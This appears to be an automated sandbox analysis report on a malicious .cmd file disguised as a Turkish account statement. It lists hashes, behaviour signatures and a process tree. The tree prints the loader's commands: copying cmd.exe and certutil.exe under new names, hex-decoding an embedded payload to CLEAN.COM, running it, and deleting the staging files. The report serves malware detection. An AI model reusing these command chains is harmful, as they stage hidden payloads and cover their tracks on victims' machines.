Analysis
-
max time kernel
141s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
22-07-2024 09:03
Static task
static1
Behavioral task
behavioral1
Sample
41570002689_20220814_05352297_HesapOzeti.cmd
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
41570002689_20220814_05352297_HesapOzeti.cmd
Resource
win10v2004-20240709-en
General
-
Target
41570002689_20220814_05352297_HesapOzeti.cmd
-
Size
2.8MB
-
MD5
eb8ef270dfe6887b0c964f718f16bbb8
-
SHA1
10a639e651479bfba415991779c24b9377b84a5d
-
SHA256
0040025ba2e8d93e1d1c118280257575f28c2e2209707bb9a11c15676c55e944
-
SHA512
89dcc90d565e6b5217775638fbd6edaaedbc8dba5de0cee810b27a791603b9980d022b025f66d3ee3692e797ef70bf290611b6e714ff8167fe9e99efe1d4324b
-
SSDEEP
24576:RrZhKnjYBTiXW66DrApJCe4tnUNLgVaQzNqWDNRp6KNng1pyyIzmAZrnf3m2+K3v:Rr0jYNi8DrApkpUNLgVDzNVpeIh/f2+
Malware Config
Signatures
-
Executes dropped EXE 8 IoCs
Processes:
alpha.exealpha.exekn.exealpha.exekn.exeCLEAN.COMalpha.exealpha.exepid Process 2816 alpha.exe 2724 alpha.exe 2844 kn.exe 2188 alpha.exe 2636 kn.exe 2700 CLEAN.COM 2396 alpha.exe 2656 alpha.exe -
Loads dropped DLL 9 IoCs
Processes:
cmd.exealpha.exealpha.exeWerFault.exepid Process 2092 cmd.exe 2092 cmd.exe 2724 alpha.exe 2092 cmd.exe 2188 alpha.exe 2092 cmd.exe 2092 cmd.exe 708 WerFault.exe 708 WerFault.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 708 2700 WerFault.exe 38 -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
CLEAN.COMpid Process 2700 CLEAN.COM -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exeCLEAN.COMdescription pid Process procid_target PID 2092 wrote to memory of 2728 2092 cmd.exe 31 PID 2092 wrote to memory of 2728 2092 cmd.exe 31 PID 2092 wrote to memory of 2728 2092 cmd.exe 31 PID 2092 wrote to memory of 2816 2092 cmd.exe 32 PID 2092 wrote to memory of 2816 2092 cmd.exe 32 PID 2092 wrote to memory of 2816 2092 cmd.exe 32 PID 2816 wrote to memory of 2832 2816 alpha.exe 33 PID 2816 wrote to memory of 2832 2816 alpha.exe 33 PID 2816 wrote to memory of 2832 2816 alpha.exe 33 PID 2092 wrote to memory of 2724 2092 cmd.exe 34 PID 2092 wrote to memory of 2724 2092 cmd.exe 34 PID 2092 wrote to memory of 2724 2092 cmd.exe 34 PID 2724 wrote to memory of 2844 2724 alpha.exe 35 PID 2724 wrote to memory of 2844 2724 alpha.exe 35 PID 2724 wrote to memory of 2844 2724 alpha.exe 35 PID 2092 wrote to memory of 2188 2092 cmd.exe 36 PID 2092 wrote to memory of 2188 2092 cmd.exe 36 PID 2092 wrote to memory of 2188 2092 cmd.exe 36 PID 2188 wrote to memory of 2636 2188 alpha.exe 37 PID 2188 wrote to memory of 2636 2188 alpha.exe 37 PID 2188 wrote to memory of 2636 2188 alpha.exe 37 PID 2092 wrote to memory of 2700 2092 cmd.exe 38 PID 2092 wrote to memory of 2700 2092 cmd.exe 38 PID 2092 wrote to memory of 2700 2092 cmd.exe 38 PID 2092 wrote to memory of 2700 2092 cmd.exe 38 PID 2092 wrote to memory of 2396 2092 cmd.exe 39 PID 2092 wrote to memory of 2396 2092 cmd.exe 39 PID 2092 wrote to memory of 2396 2092 cmd.exe 39 PID 2092 wrote to memory of 2656 2092 cmd.exe 40 PID 2092 wrote to memory of 2656 2092 cmd.exe 40 PID 2092 wrote to memory of 2656 2092 cmd.exe 40 PID 2700 wrote to memory of 708 2700 CLEAN.COM 42 PID 2700 wrote to memory of 708 2700 CLEAN.COM 42 PID 2700 wrote to memory of 708 2700 CLEAN.COM 42 PID 2700 wrote to memory of 708 2700 CLEAN.COM 42
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\41570002689_20220814_05352297_HesapOzeti.cmd"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:2728
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2832
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\41570002689_20220814_05352297_HesapOzeti.cmd" "C:\\Users\\Public\\CLEAN.GIF" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\41570002689_20220814_05352297_HesapOzeti.cmd" "C:\\Users\\Public\\CLEAN.GIF" 93⤵
- Executes dropped EXE
PID:2844
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 122⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 123⤵
- Executes dropped EXE
PID:2636
-
-
-
C:\Users\Public\Libraries\CLEAN.COMC:\Users\Public\Libraries\CLEAN.COM2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 7123⤵
- Loads dropped DLL
- Program crash
PID:708
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2396
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2656
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD54c63a70c4224e12f302dc97da70bff09
SHA127da43a347a39fc3582ce98bb77726bf0f0d788b
SHA25600032a8c09f96d692586cfa0b0894bb12049e8266f9bc8c2a5950f4c542269fd
SHA512a21072370b65e9a0dc9a7be4c840c4353114e9e1f695cadd46ad1fab2fd751d27e9a38b6dad545bbcba2a2eb93c640791be31fc08e32f055c6fad4efec444544
-
Filesize
955KB
MD537d7e65db3d1daaba7f4f3a422f256c0
SHA1845ddbc4975214a41098d5d7d1a039e27a9acc9d
SHA256e6967254aa75982a43c73985e63d60f5b0688ceeb06c11c1748622959cb95c08
SHA512edb70bdda279422aaded553a3d6d5ad36c1659181394c4c488f41d257b5fa1707f0db456d2c549a7c8ec8944b3ca90703788ccce3f0d8cb26fc43b6fd42a3011
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2